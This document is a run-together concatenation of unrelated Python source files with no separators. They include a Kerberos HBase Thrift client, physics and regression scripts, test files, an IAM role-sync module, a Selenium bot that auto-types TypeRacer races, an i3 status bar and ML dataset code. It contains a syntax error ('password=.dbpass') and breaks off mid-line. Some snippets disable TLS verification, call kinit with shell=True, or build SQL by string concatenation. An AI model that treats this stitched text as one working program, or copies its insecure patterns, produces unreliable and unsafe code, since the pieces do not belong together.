keytab="/run/cloudera-scm-agent/process/1546335371-hbase-HBASETHRIFTSERVER/hbase.keytab" kinitCommand="kinit"+" "+"-kt"+" "+keytab+" "+clientPrincipal call(kinitCommand,shell="True") hbaseService="HTTP" __, krb_context = kerberos.authGSSClientInit(hbaseService) kerberos.authGSSClientStep(krb_context, "") negotiate_details = kerberos.authGSSClientResponse(krb_context) headers = {'Authorization': 'Negotiate ' + negotiate_details,'Content-Type':'application/binary'} return headers httpClient = THttpClient.THttpClient('https://c2677-node4.coelab.cloudera.com:9090/', cert_file='/etc/pki/tls/certs/localhost.crt',key_file='/etc/pki/tls/private/localhost.key', ssl_context=ssl._create_unverified_context()) # if no ssl verification is required httpClient.setCustomHeaders(headers=kerberos_auth()) protocol = TBinaryProtocol.TBinaryProtocol(httpClient) httpClient.open() client = Client(protocol) tables=client.getTableNames() print(tables) httpClient.close() Chen-Jialin/Undergraduate-Thesis # 估算 CdSe 量子点 from math import * c = 3e8# 光速 h = 6.63e-34# 普朗克常数 epsilon_0 = 8.85e-12# 真空中介电常数 epsilon_r = 8.0251# CdSe 相对介电常数 e = 1.6e-19# 元电荷 m_e = 9.11e-31# 电子质量 m_e_eff = 0.12 * m_e# 电子有效质量 m_h_eff = 0.9 * m_e# 空穴有效质量 wavelength = 646# 波长 nm E_gap = 1.74 * 1.6e-19# 体块材料带隙 Delta_E = h * c / (wavelength * 1e-9)# 量子点带隙 a = h**2 / 8 * (1 / m_e_eff + 1 / m_h_eff) b = -1.8 * e**2 / 4 / pi / epsilon_0 / epsilon_r c = E_gap - Delta_E r = 1 / ((-b + sqrt(b**2 - 4 * a * c)) / (2 * a)) print(2 * r) pcworld/ldapom # -*- coding: utf-8 -*- from paver.easy import * @task def test(options): info("Running tests for Python 2") sh('python2 -m unittest -v tests') info("Running tests for Python 3") sh('python3 -m unittest -v tests') @task def coverage(options): info("Running coverage for Python 2") sh('coverage2 run --source ldapom ./tests.py') sh('coverage2 report') info("Running coverage for Python 3") sh('coverage3 run --source ldapom ./tests.py') sh('coverage3 report') #!/usr/bin/env python # -*- coding: utf-8 -*- from setuptools import find_packages, setup from specchio import __version__ tests_requirements = [ "mock >= 1.0.1, < 2.0.0", "testfixtures >= 4.1.2, < 5.0.0" ] setup( name="Specchio", version=__version__, url="https://github.com/brickgao/specchio", license="MIT", description="Specchio is a tool that can help you to rsync your file " "automatically, it uses `.gitignore` in git to discern which" " file is ignored.", long_description=open("README.md").read(), author="", author_email="", packages=find_packages(exclude=["tests"]), zip_safe=False, install_requires=[ "colorlog >= 2.6.0, < 3.0.0", "watchdog >= 0.8.3, < 1.0.0" ] + tests_requirements, tests_require=tests_requirements, test_suite="nose.collector", entry_points={ "console_scripts": [ "specchio = specchio.main:main" ], }, classifiers=[ "Environment :: Console", "Intended Audience :: Developers", "License :: OSI Approved :: MIT License", "Programming Language :: Python", "Programming Language :: Python :: 2", "Topic :: Software Development :: Testing", "Topic :: Software Development :: Libraries :: Python Modules", ], ) """Database migrations for the iati_standard app.""" typeracer.py0 from selenium import webdriver from selenium.webdriver.common.by import By from selenium.webdriver.common.keys import Keys import time from random import randint #Set minimum WPM required min_wpm = 60 #Open Chrome driver = webdriver.Chrome(executable_path="chromedriver.exe") # Enter the URL # Start Race # Press the enter key when the race has started, when the program is in the waiting state while(1): text = '' k = input("waiting") a = driver.find_elements_by_xpath("//span[@unselectable='on']") for i in a: text = text + i.get_attribute('innerHTML') print(text) text.replace("\\","") if text[-1] != '.' or text[-1] != '!' or text[-1] != '?': text = text + ' ' time.sleep(1) print("Typing text") for letter in text: delay = randint(1,100) try: driver.find_element_by_xpath("//input[@autocorrect='off']").send_keys(letter) except: break time.sleep((delay/100)*(60/(5*min_wpm))) import random from sklearn.model_selection import GridSearchCV from datetime import datetime class GridSearch: def __init__(self, model, params, samples, lables): self.model = model self.params = params self.samples = samples self.lables = lables def search(self): print "Grid searh begins at (%s) ..." %(str(datetime.now())) chunk_size = int(self.samples.shape[0]*0.2) test_set_index = range(self.samples.shape[0]) random.shuffle(test_set_index) search_sample_set = self.samples[test_set_index[0:chunk_size]] search_lable_set = self.lables[test_set_index[0:chunk_size]] self.grid = GridSearchCV(self.model, param_grid=self.params) self.grid.fit(search_sample_set, search_lable_set) print "Grid searh ends at (%s) ..." %(str(datetime.now())) return self.grid.best_params_############################################################################## # Copyright 2020 Amazon.com, Inc. or its affiliates. All Rights Reserved. # # # # Licensed under the Apache License, Version 2.0 (the "License"). # # You may not use this file except in compliance # # with the License. A copy of the License is located at # # # # http://www.apache.org/licenses/LICENSE-2.0 # # # # or in the "license" file accompanying this file. This file is # # distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # # KIND, express or implied. See the License for the specific language # # governing permissions and limitations under the License. # ############################################################################## from moto import mock_ssm from utils.logger import Logger from manifest.cfn_params_handler import CFNParamsHandler from aws.services.ssm import SSM log_level = 'info' logger = Logger(loglevel=log_level) cph = CFNParamsHandler(logger) ssm = SSM(logger) def test_update_alfred_ssm(): keyword_ssm = 'alfred_ssm_not_exist_alfred_ssm' value_ssm = 'parameter_store_value' value_ssm, param_flag = cph._update_alfred_ssm( keyword_ssm, value_ssm, False) assert param_flag is True @mock_ssm def test_update_alfred_genkeypair(): ssm.put_parameter('testkeyname', 'testvalue', 'A test parameter', 'String') param = { "ssm_parameters": [ { "name": "keymaterial", "value": "$[keymaterial]" }, { "name": "keyfingerprint", "value": "$[keyfingerprint]" }, { "name": "testkeyname", "value": "$[keyname]" } ] } account = 1234567890 region = 'us-east-1' value = cph._update_alfred_genkeypair(param, account, region) assert value == 'testvalue' @mock_ssm def test_update_alfred_genpass(): ssm.put_parameter('testkeyname', 'testvalue', 'A test parameter', 'String') param = { "ssm_parameters": [ { "name": "testkeyname", "value": "$[password]" } ] } keyword = 'alfred_genpass_10' value = '' value = cph._update_alfred_genpass(keyword, param) assert value == '_get_ssm_secure_string_testkeyname' @mock_ssm def test_update_alfred_genaz(): ssm.put_parameter('testkeyname', 'testvalue', 'A test parameter', 'String') param = { "ssm_parameters": [ { "name": "testkeyname", "value": "$[az]" } ] } keyword = 'alfred_genaz_1' account = 1234567890 region = 'us-east-1' value = '' value = cph._update_alfred_genaz(keyword, param, account, region) assert value == 'testvalue' @mock_ssm def test_random_password(): ssm.put_parameter('testkeyname', 'testvalue', 'A test parameter', 'String') length = 10 key_password = '' alphanum = False value = cph.random_password(length, key_password, alphanum) assert value == '_get_ssm_secure_string_testkeyname' from copy import copy class Shared: dictio = {} def apply(con, tab_name): query = "SELECT FIELDNAME, DOMNAME, KEYFLAG, CHECKTABLE, ROLLNAME FROM "+con.table_prefix+"DD03VV WHERE TABNAME = '"+tab_name+"' ORDER BY POSITION" df = con.execute_read_sql( query, ["FIELDNAME", "DOMNAME", "KEYFLAG", "CHECKTABLE", "ROLLNAME"]) df = df[df["DOMNAME"] != " "] try: df["FIELDNAME"] = "event_" + df["FIELDNAME"] except: pass return df def apply_static(con, tab_name): if tab_name not in Shared.dictio: Shared.dictio[tab_name] = apply(con, tab_name) return copy(Shared.dictio[tab_name]) def classify_table(con, tab_name, all_tables=None): if all_tables is None: all_tables = dict() primary_keys = {} for x in all_tables: fields2 = apply_static(con, tab_name=x).to_dict("r") pk = set() for el in fields2: if el["KEYFLAG"] == "X": pk.add(el["FIELDNAME"]) primary_keys[x] = pk fields = apply_static(con, tab_name=tab_name) stream = fields.to_dict("r") fields_dict = {x["FIELDNAME"]: x["DOMNAME"] for x in stream} for key in fields_dict: if "TCODE" in key: return "Transaction" for key in fields_dict: if "VBTYP" in key: return "Flow" for x in primary_keys: if x != tab_name: if primary_keys[tab_name].issuperset(primary_keys[x]): if not primary_keys[x].issuperset(primary_keys[tab_name]): return "Detail" return "Record" software/algorithm/tof-to-distance/tof2distance.py import os import matplotlib.pyplot as plt import numpy as np from sklearn.linear_model import LinearRegression DATA_DIR = "distance" xss = [] yss = [] for filename in os.listdir(DATA_DIR): print(filename) xs = [] ys = [] y = float(filename) f = open(DATA_DIR + "/" + filename, 'r') for i in range(0, 50): line = f.readline() print(str(i) + ": " + line) x = float(line) print(str(x) + ": " + str(y)) xs.append(x) ys.append(y) plt.plot(xs,ys, 'x') xss.append(xs) yss.append(ys) x = np.array(xss).reshape((-1, 1)) y = np.array(yss).reshape((-1)) model = LinearRegression() model.fit(x, y) x = np.arange(0, 3500, 1) y = model.predict(np.array(x).reshape((-1, 1))) plt.plot(x,y) # x = [352] # y = model.predict(np.array(x).reshape((-1, 1))) # print(y) print(model.coef_[0]) print(model.intercept_) # x = 368 # y = model.coef_[0] * x + model.intercept_ # print(str(x) + ": " + str(y)) error_sum = 0 error_count = 0 for filename in os.listdir(DATA_DIR): print(filename) xs = [] ys = [] y = float(filename) f = open(DATA_DIR + "/" + filename, 'r') for i in range(0, 50): line = f.readline() print(str(i) + ": " + line) x = float(line) est_y = model.coef_[0] * x + model.intercept_ error_sum += abs(est_y - y) error_count += 1 print("mean error:" + str(error_sum/error_count)) plt.show()# Generated by Django 2.1.2 on 2018-12-07 18:13 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('westmarchSite', '0002_auto_20181207_1725'), ] operations = [ migrations.AlterField( model_name='character', name='Bio', field=models.TextField(null=True, verbose_name='Full Bio'), ), migrations.AlterField( model_name='character', name='BioShort', field=models.CharField(max_length=120, null=True, verbose_name='Short description'), ), ] 0 # @Author ZhangGJ # @Date 2021/01/24 10:12 import urllib.parse import urllib.request data = bytes(urllib.parse.urlencode({'word': 'hello'}), encoding='utf8') response = urllib.request.urlopen('http://httpbin.org/post', data=data) print(response.read()) x = [map(int,raw_input().split()) for i in range(4)] cnt = 0 y = [0]*4 for i in range(4): cnt += x[i][1] - x[i][0] y[i] = cnt print max(y)sitedata/analog """Analog tests.""" from __future__ import (absolute_import, division, print_function, unicode_literals) # -*- coding: utf-8 -*- """ Tencent is pleased to support the open source community by making BK-BASE 蓝鲸基础平台 available. Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved. BK-BASE 蓝鲸基础平台 is licensed under the MIT License. License for BK-BASE 蓝鲸基础平台: -------------------------------------------------------------------- Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ import time import attr from auth.bkiam.backend import IAMBackend from auth.exceptions import BKIAMNotSupportAttrAutho, BKIAMSyncAuthoErr from auth.handlers.resource.manager import AuthResourceManager from auth.models.base_models import ActionConfig, RoleConfig, RolePolicyInfo from common.log import logger from iam import Action, Subject from iam.auth.models import ( ApiBatchAuthRequest, ApiBatchAuthResourceWithId, ApiBatchAuthResourceWithPath, ) class RoleSync: GRANT = "grant" REVOKE = "revoke" def __init__(self): self.backend = IAMBackend() self._iam = self.backend._iam self.system = self.backend.system def sync(self, user_id, role_id, object_id, operate): """ 与 IAM 同步权限,operate 可以为 grant 或者 revoke """ role = RoleConfig.objects.get(pk=role_id) if not role.to_iam: return policies = self.get_related_policies_with_role(role_id) role_resource = AuthResourceManager.init(role.object_class_id).get(object_id, raise_exception=True) instance_policies, path_polices = self.classify_policies(policies, role_id, role_resource.resource_type) instance_action_ids = [p.action_id for p in instance_policies] path_action_ids = [p.action_id for p in path_polices] args = [user_id, role_id, instance_action_ids, path_action_ids, operate] start_time = time.time() try: self.sync_one_resource_more_inst_actions(user_id, role_resource, instance_policies, operate) self.sync_one_resource_more_path_actions(user_id, role_resource, path_polices, operate) except Exception as err: logger.exception(f"[IAM RoleSync] Fail to sync, args={args}, error={err}") raise BKIAMSyncAuthoErr() finally: end_time = time.time() logger.info("[IAM RoleSync] Cost {} seconds, args={}".format(end_time - start_time, args)) logger.info(f"[IAM RoleSync] Succeed to sync, args={args}") def classify_policies(self, policies, role_id, resource_type): """ 将策略分类,主要分为实例策略和路劲策略 """ instance_policies = list() path_polices = list() for p in policies: if not p.has_instance: continue if not p.to_iam: continue if p.scope_attr_key: raise BKIAMNotSupportAttrAutho( ("Now cannot sync attr_authentication to iam, " "role_id={}, policy={}").format(role_id, p) ) if resource_type == p.object_class: instance_policies.append(p) else: path_polices.append(p) return instance_policies, path_polices def sync_one_resource_more_inst_actions(self, user_id, role_resource, policies, operate): """ 同步一个资源,多个实例动作 """ action_ids = [p.action_id for p in policies] resources = [ ApiBatchAuthResourceWithId( self.system, role_resource.resource_type, [{"id": role_resource.id, "name": role_resource.display_name}] ) ] request = self._make_batch_request_with_resources(user_id, action_ids, resources, operate) self._iam.batch_grant_or_revoke_instance_permission(request, bk_username=user_id) def sync_one_resource_more_path_actions(self, user_id, role_resource, policies, operate): """ 同步一个资源,多个路径动作 """ # 生成资源路径 path = [{"type": role_resource.resource_type, "id": role_resource.id, "name": role_resource.display_name}] # 按照 object_class 对 action 分类,仅相同资源类型的 actions 可以合并授权 actions_mapping = dict() for p in policies: actions_mapping.setdefault(p.object_class, []) actions_mapping[p.object_class].append(p.action_id) for action_resource_type, action_ids in list(actions_mapping.items()): resources = [ApiBatchAuthResourceWithPath(self.system, action_resource_type, [path])] request = self._make_batch_request_with_resources(user_id, action_ids, resources, operate) self._iam.batch_grant_or_revoke_path_permission(request, bk_username=user_id) def grant(self, user_id, role_id, object_id): """ 添加角色授权,同步 IAM """ self.sync(user_id, role_id, object_id, operate=self.GRANT) def revoke(self, user_id, role_id, object_id): """ 取消角色授权,同步 IAM """ self.sync(user_id, role_id, object_id, operate=self.REVOKE) def _make_batch_request_with_resources(self, user_id, action_ids, resources, operate): request = ApiBatchAuthRequest( self.system, Subject("user", user_id), [Action(action_id) for action_id in action_ids], resources, operate=operate, ) return request def get_related_policies_with_role(self, role_id, action_id=None, to_iam=True): """ 获取与角色关联的操作 @returnExample role_id=project.manager 样例 [ { 'action_id': 'flow.manage', 'object_class': 'flow', 'scope_attr_key': null, 'scope_attr_value': null }, { 'action_id': 'result_table.query_data', 'object_class': 'result_table', 'scope_attr_key': 'sensitivity', 'scope_attr_value': 'private' }, { 'action_id': 'project.manage', 'object_class': 'project', 'scope_attr_key': null, 'scope_attr_value': null } ] """ if action_id is None: raw_policies = RolePolicyInfo.objects.filter(role_id_id=role_id) else: raw_policies = RolePolicyInfo.objects.filter(role_id_id=role_id, action_id_id=action_id) cleaned_policies = list() for p in raw_policies: if p.action_id_id == "*": actions = ActionConfig.objects.filter(object_class=p.object_class_id, to_iam=to_iam) policies = [ ActionPolicy( action_id=self.backend.to_iam_action(a.action_id), has_instance=a.has_instance, to_iam=a.to_iam, object_class=p.object_class_id, scope_attr_key=p.scope_attr_key, scope_attr_value=p.scope_attr_value, ) for a in actions ] else: action = ActionConfig.objects.get(pk=p.action_id_id) if action.to_iam == to_iam: policies = [ ActionPolicy( action_id=self.backend.to_iam_action(action.action_id), has_instance=action.has_instance, to_iam=action.to_iam, object_class=p.object_class_id, scope_attr_key=p.scope_attr_key, scope_attr_value=p.scope_attr_value, ) ] else: policies = [] cleaned_policies.extend(policies) # 去重 cleaned_policies = list({p.action_id: p for p in cleaned_policies}.values()) return cleaned_policies @attr.s class ActionPolicy: action_id = attr.ib(type=str) has_instance = attr.ib(type=bool) to_iam = attr.ib(type=bool) object_class = attr.ib(type=str) scope_attr_key = attr.ib(type=str) scope_attr_value = attr.ib(type=str) 10-100 """Management command for populating ocw course data""" from django.core.management import BaseCommand from course_catalog.models import Course from course_catalog.tasks import get_ocw_data from open_discussions.constants import ISOFORMAT from open_discussions.utils import now_in_utc from search.task_helpers import delete_course class Command(BaseCommand): """Populate ocw courses""" help = "Populate ocw courses" def add_arguments(self, parser): parser.add_argument( "--overwrite", dest="force_overwrite", action="store_true", help="Overwrite any existing records", ) parser.add_argument( "--delete", dest="delete", action="store_true", help="Delete all existing records first", ) parser.add_argument( "--skip-s3", dest="upload_to_s3", action="store_false", help="skip uploading course files to s3", ) parser.add_argument( "--course-url-substring", dest="course_url_substring", required=False, help="If set, backpopulate only courses whose urls match with this substring", ) super().add_arguments(parser) def handle(self, *args, **options): """Run Populate ocw courses""" course_url_substring = options.get("course_url_substring") if options["delete"]: self.stdout.write("Deleting all existing OCW courses") for course in Course.objects.filter(platform="ocw"): course.delete() delete_course(course) else: start = now_in_utc() task = get_ocw_data.delay( force_overwrite=options["force_overwrite"], upload_to_s3=options["upload_to_s3"], course_url_substring=course_url_substring, utc_start_timestamp=start.strftime(ISOFORMAT), ) self.stdout.write( "Started task {task} to get ocw course data " "w/force_overwrite={overwrite}, upload_to_s3={s3}, course_url_substring={course_url_substring}".format( task=task, overwrite=options["force_overwrite"], s3=options["upload_to_s3"], course_url_substring=course_url_substring, ) ) self.stdout.write("Waiting on task...") task.get() total_seconds = (now_in_utc() - start).total_seconds() self.stdout.write( "Population of ocw data finished, took {} seconds".format(total_seconds) ) import io import json from src import cmd from src import database from pydub import AudioSegment from pydub import playback if __name__ == "__main__": parser = cmd.getArgumentParser() parser.add_argument('-song_id', type=int, required=True, help='Song ID containing beat') parser.add_argument('-beat_id', type=int, required=True, help='Beat ID to play') args = parser.parse_args() db = database.Database( host=args.dbhost, port=args.dbport, dbname=args.dbname, user=args.dbuser, password=.dbpass ) songs = db.getSongs(id = args.song_id) if 0 == songs: print("Not Found") exit(1) beats = songs[0].getBeats(id = args.beat_id) if 0 == beats: print("Not Found") exit(1) clip = io.BytesIO(beats[0].clip.tobytes()) segment = AudioSegment.from_file(clip, format=beats[0].format) playback.play(segment) wanglabprinceton/accumulating_puffsutil/tcpip.py import socket, time import numpy as np import logging, json class TCPIP(): def __init__(self, tcpip_address, tcpip_port=6666, tcpip_terminator='\n'): if tcpip_address is None: self._valid = False return self._valid = True self.tcpip_address = tcpip_address self.tcpip_port = tcpip_port self.tcpip_terminator = tcpip_terminator # setup socket self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.socket.settimeout(0.500) #brief when initiating try: self.socket.connect((self.tcpip_address, self.tcpip_port)) except socket.timeout: pass #logging.warning('Socket not connected.') except: logging.warning('TCPIP not connected; turn on internet to send messages.') return self.socket.settimeout(10.0) def send(self, msg): if not self._valid: return True try: # msg : a JSON-formatted string or dict to be converted to one if isinstance(msg, dict): msg = json.dumps(msg) self.socket.send(msg.encode(encoding='utf-8')) self.socket.send(self.tcpip_terminator.encode(encoding='utf-8')) except socket.timeout: logging.warning('TCPIP message did not send.') return False try: r = self.socket.recv(3) if r.decode('UTF8') != '_ok': logging.warning('TCPIP did not receive OK response; communication issue.') return False else: self._reconnect() except socket.timeout: logging.warning('Attempted TCPIP send; no reply from remote; re-establish connection.') return False return True def end(self): if self._valid: self.socket.close() def reconnect(self): if not self._valid: return True return self._reconnect() def _reconnect(self): #print ('Click reconnect on remote computer...') self.socket.close() self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.socket.settimeout(10.0) try: self.socket.connect((self.tcpip_address, self.tcpip_port)) except socket.timeout: logging.warning('Reconnect failed; socket not connected.') return False return True #print('Reconnected.') if __name__ == '__main__': address = '172.16.58.3' t = TCPIP(address) from PIL import Image from SSIM_PIL import compare_ssim from PIL import Image import requests from io import BytesIO from sklearn import metrics import numpy as np #import cv2 #from SSIM_PIL import compare_ssim from PIL import Image def distance_diff_size_plot(images_sentinel,images_naip): #right location experiment MSE_global_r = [] SSIM_global_r = [] for i in range(0,20): #print(i) drone_url = images_sentinel[i] planet_url = images_naip[i] location = "TRUE" #response = requests.get(drone_url) drone_img = Image.open(drone_url) planet_img = Image.open(planet_url) planet_img = planet_img.convert('RGB') drone_img = drone_img.resize((512,512)) base_planet_img = planet_img.resize((512, 512)) x_1 = [] for i in range(1,43): num = 12*i if (num % 2) != 0: num = num+1 x_1.append(num) if i == 42: x_1.append(512) #print(x_1) if location == "TRUE": MSE_tt = [] SSIM_tt = [] for i in range(0,43): if i in range(0,42): #print(i) width = x_1[i]/2 #print(width) cropped_drone_img = drone_img.crop((256 - width, 256 - width, 256 + width, 256 + width)) #print("size",cropped_drone_img.size) cropped_drone_img = drone_img.crop((256 - width, 256 - width, 256 + width, 256 + width)).resize((512, 512)) cropped_planet_img = base_planet_img.crop((256 - width, 256 - width, 256 + width, 256 + width)).resize((512, 512)) np_drone = np.array(cropped_drone_img) np_planet = np.array(cropped_planet_img) MSE = metrics.mean_squared_error(np_drone.flatten(), np_planet.flatten()) MSE_tt.append(MSE) SSIM = compare_ssim(cropped_drone_img,cropped_planet_img) SSIM_tt.append(SSIM) else: #print(i, "after 500") if i == 43: cropped_drone_img = cropped_drone_img.resize((512, 512)) cropped_planet_img = base_planet_img.resize((512, 512)) cropped_drone_img = cropped_drone_img.resize((i*12, i*12)) cropped_planet_img = base_planet_img.resize((i*12, i*12)) #print(cropped_planet_img.size) np_drone = np.array(cropped_drone_img) np_planet = np.array(cropped_planet_img) MSE = metrics.mean_squared_error(np_drone.flatten(), np_planet.flatten()) MSE_tt.append(MSE) SSIM = compare_ssim(cropped_drone_img,cropped_planet_img) SSIM_tt.append(SSIM) #print(len(MSE_global_r)) SSIM_global_r.append(SSIM_tt) MSE_global_r.append(MSE_tt) #wrong location experiment import random location = "WRONG" MSE_global_wl = [] SSIM_global_wl = [] def rotate(l, n): return l[n:] + l[:n] for i in range(0,20): drone_url = images_sentinel[i] images_naip_rot = rotate(images_naip, 2) planet_url = images_naip_rot[i] drone_img = Image.open(drone_url) planet_img = Image.open(planet_url) planet_img = planet_img.convert('RGB') drone_img = drone_img.resize((512,512)) base_planet_img = planet_img.resize((512, 512)) x_1 = [] for i in range(1,43): num = 12*i if (num % 2) != 0: num = num+1 x_1.append(num) if i == 42: x_1.append(512) if location == "WRONG": MSE_tt = [] SSIM_tt = [] for i in range(0,43): if i in range(0,42): width = x_1[i]/2 cropped_drone_img = drone_img.crop((256 - width, 256 - width, 256 + width, 256 + width)) cropped_drone_img = drone_img.crop((256 - width, 256 - width, 256 + width, 256 + width)).resize((512, 512)) cropped_planet_img = base_planet_img.crop((256 - width, 256 - width, 256 + width, 256 + width)).resize((512, 512)) np_drone = np.array(cropped_drone_img) np_planet = np.array(cropped_planet_img) MSE = metrics.mean_squared_error(np_drone.flatten(), np_planet.flatten()) MSE_tt.append(MSE) SSIM = compare_ssim(cropped_drone_img,cropped_planet_img) SSIM_tt.append(SSIM) else: if i == 43: cropped_drone_img = cropped_drone_img.resize((512, 512)) cropped_planet_img = base_planet_img.resize((512, 512)) cropped_drone_img = cropped_drone_img.resize((i*12, i*12)) cropped_planet_img = base_planet_img.resize((i*12, i*12)) np_drone = np.array(cropped_drone_img) np_planet = np.array(cropped_planet_img) MSE = metrics.mean_squared_error(np_drone.flatten(), np_planet.flatten()) MSE_tt.append(MSE) SSIM = compare_ssim(cropped_drone_img,cropped_planet_img) SSIM_tt.append(SSIM) MSE_global_wl.append(MSE_tt) SSIM_global_wl.append(SSIM_tt) import pandas as pd x_2 = [i*i for i in x_1] df_r = pd.DataFrame(MSE_global_r, index =["image 1", "image 2", "image 3", "image 4", "image 5", "image 6","image 7", "image 8", "image 9","image 10","image 11", "image 12", "image 13", "image 14", "image 15", "image 16","image 17", "image 18", "image 19","image 20"], columns =x_2) tmp_df_r = df_r df_wl = pd.DataFrame(MSE_global_wl, index =["image 1", "image 2", "image 3", "image 4", "image 5", "image 6","image 7", "image 8", "image 9","image 10","image 11", "image 12", "image 13", "image 14", "image 15", "image 16","image 17", "image 18", "image 19","image 20"], columns =x_2) tmp_df_wl = df_wl A_r = [] for k in tmp_df_r.keys(): row_df = tmp_df_r[k] #row_df_wt = tmp_df_wt[k] row_df_wl = tmp_df_wl[k] for row in row_df.index: a = [row, float(row_df[row]), float(k), "rl"] #b = [row, float(row_df_wt[row]), float(k), "wt-rl"] c = [row, float(row_df_wl[row]), float(k), "wl"] A_r += [a] #A_r += [b] A_r += [c] new_pd_r = pd.DataFrame(A_r, columns=["Image", "Distance", "Area", "Experiment"]) import matplotlib.pyplot as plt import seaborn as sns plt = sns.lineplot(x="Area", y="Distance", hue="Experiment", data=new_pd_r, palette=["g","r"]) plt.ticklabel_format(style='sci', axis='x', scilimits=(0,0)) plt.set(xlabel="Area in $m^2$", ylabel='MSE') #sns.set_style("ticks", {"xtick.major.size": 8, "ytick.major.size": 8}) #sns.ticklabel_format(self,axis='both', style='', scilimits=None, useOffset=None, useLocale=None, useMathText=None) #!/usr/bin/env python3 from threading import Timer import i3ipc import json import psutil import time import urllib.request timer = None statsIntervalSec = 5 covidInterval = 600/statsIntervalSec counter = 0 covidCases = 0 workspaceStatus = "         " #           batteryStatus = "" # full, charging, discharging batteryCharge = 1.0 # out of 1.0 centerStats = '' rightStats = '' def render(): statusText = workspaceStatus if batteryStatus != "full": secondaryColor = "ffb86c" if batteryStatus == "discharging" else "8be9fd" batteryWidth = round(batteryCharge * len(workspaceStatus)) statusText = "%{U#ffffff}%{+o}" + statusText[:batteryWidth] \ + "%{U#" + secondaryColor + "}" \ + statusText[batteryWidth:] + "%{-o}" \ + " {0:.0%}".format(batteryCharge) print(' '+statusText+'%{c}'+centerStats+'%{r}'+rightStats+' ') i3 = i3ipc.Connection() def updateWorkspaceStatus(): global workspaceStatus activeWorkspaces = [] focusedWorkspace = -1 for j in i3.get_workspaces(): activeWorkspaces.append(j.num) if j.focused: focusedWorkspace = j.num statusText = "" for i in range(1, 11): if i == focusedWorkspace: statusText += " " elif i in activeWorkspaces: statusText += " " else: statusText += " " workspaceStatus = statusText.strip() # Subscribe to events def handleWorkspaceUpdate(self, e): updateWorkspaceStatus() render() def updateStats(): global batteryStatus, batteryCharge, centerStats, rightStats, timer, counter, covidCases if counter % covidInterval == 0: try: web = urllib.request.urlopen("https://coronavirus-19-api.herokuapp.com/all") covidCases = json.loads(web.read().decode())["cases"] except: pass counter += 1 with open("/sys/class/power_supply/BAT0/status", 'r') as f: batteryStatus = f.readlines()[0].lower().strip() if batteryStatus != "full": with open("/sys/class/power_supply/BAT0/charge_full", 'r') as f: chargeFull = int(f.readlines()[0].strip()) with open("/sys/class/power_supply/BAT0/charge_now", 'r') as f: chargeNow = int(f.readlines()[0].strip()) batteryCharge = chargeNow / chargeFull cpu = round(sum(psutil.cpu_percent(percpu=True))/2) # two vCPUs per CPU try: temps = psutil.sensors_temperatures()['coretemp'] except: temps = [0] temp = round(max([t.current for t in temps])) ram = psutil.virtual_memory().used/1000/1000/1000 # '127% 10* ziggy 12.64 GB' centerStats = '{:3}% {:2}° {} {:2.2f} GB'.format(cpu, temp, 'ziggy', ram) rightStats = '{:,}'.format(covidCases) + ' ' + time.strftime('%Y-%m-%d %H:%M') timer = Timer(statsIntervalSec, updateStats) timer.start() render() updateWorkspaceStatus() updateStats() i3.on('workspace::focus', handleWorkspaceUpdate) try: i3.main() except KeyboardInterrupt: timer.cancel() import tensorflow as tf from Dataset import Dataset from constants import IMAGENET_TF_DATADIR slim = tf.contrib.slim class ImageNet(Dataset): SPLITS_TO_SIZES = {'train': 1281167, 'validation': 50000} ITEMS_TO_DESCRIPTIONS = { 'image': 'A color image of varying height and width.', 'height': 'Height of the image in pixels', 'width': 'Width of the image in pixels', 'edges': 'An edge map of the same size as the image.', 'cartoon': 'An cartooned version of the image.', 'label': 'The label id of the image, integer between 0 and 999', 'label_text': 'The text of the label.', } def __init__(self): Dataset.__init__(self) self.data_dir = IMAGENET_TF_DATADIR self.file_pattern = '%s-*' self.num_classes = 1000 self.label_offset = 1 self.name = 'imagenet' def get_keys_to_features(self): keys_to_features = { 'image/encoded': tf.FixedLenFeature((), tf.string, default_value=''), 'image/format': tf.FixedLenFeature((), tf.string, default_value='jpeg'), 'image/height': tf.FixedLenFeature((), tf.int64), 'image/width': tf.FixedLenFeature((), tf.int64), 'image/class/label': tf.FixedLenFeature([], dtype=tf.int64, default_value=-1), 'image/class/text': tf.FixedLenFeature([], dtype=tf.string, default_value=''), } return keys_to_features def get_items_to_handlers(self): items_to_handlers = { 'image': slim.tfexample_decoder.Image('image/encoded', 'image/format', channels=3), 'height': slim.tfexample_decoder.Tensor('image/height'), 'width': slim.tfexample_decoder.Tensor('image/width'), 'label': slim.tfexample_decoder.Tensor('image/class/label'), 'label_text': slim.tfexample_decoder.Tensor('image/class/text'), } return items_to_handlers def get_trainset_labelled(self): return self.get_split('train') def get_trainset_unlabelled(self): return self.get_split('train') def get_testset(self): return self.get_split('validation') def get_num_train_labelled(self): return self.SPLITS_TO_SIZES['train'] def get_num_train_unlabelled(self): return self.SPLITS_TO_SIZES['train'] def get_num_test(self): return self.SPLITS_TO_SIZES['validation'] import torch import torch.nn as nn from typing import Union, List, Dict, Any, cast __all__ = [ 'VGG', 'vgg11_m4', 'vgg11_m4_bn', 'vgg11', 'vgg11_bn', 'vgg13', 'vgg13_bn', 'vgg16', 'vgg16_bn', 'vgg19_bn', 'vgg19', ] class VGG(nn.Module): def __init__(self, features: nn.Module, num_classes: 100, init_weights: bool = True) -> None: super(VGG, self).__init__() self.features = features self.avgpool = nn.AdaptiveAvgPool2d((6, 6)) self.classifier = nn.Sequential( nn.Linear(512 